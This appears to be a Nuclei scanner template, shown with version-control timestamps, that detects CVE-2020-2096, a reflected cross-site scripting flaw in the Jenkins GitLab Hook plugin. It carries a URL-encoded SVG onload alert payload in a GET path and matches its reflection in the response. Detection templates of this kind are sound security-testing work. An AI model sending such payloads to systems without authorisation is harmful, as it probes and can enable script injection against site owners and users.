2020-04-08 10:59:57 +00:00
|
|
|
id: CVE-2020-2096
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Jenkins Gitlab Hook XSS
|
|
|
|
author: madrobot
|
|
|
|
severity: medium
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2020-04-08 14:42:57 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "<svg/onload=alert(1337)>"
|
2020-04-08 10:59:57 +00:00
|
|
|
part: body
|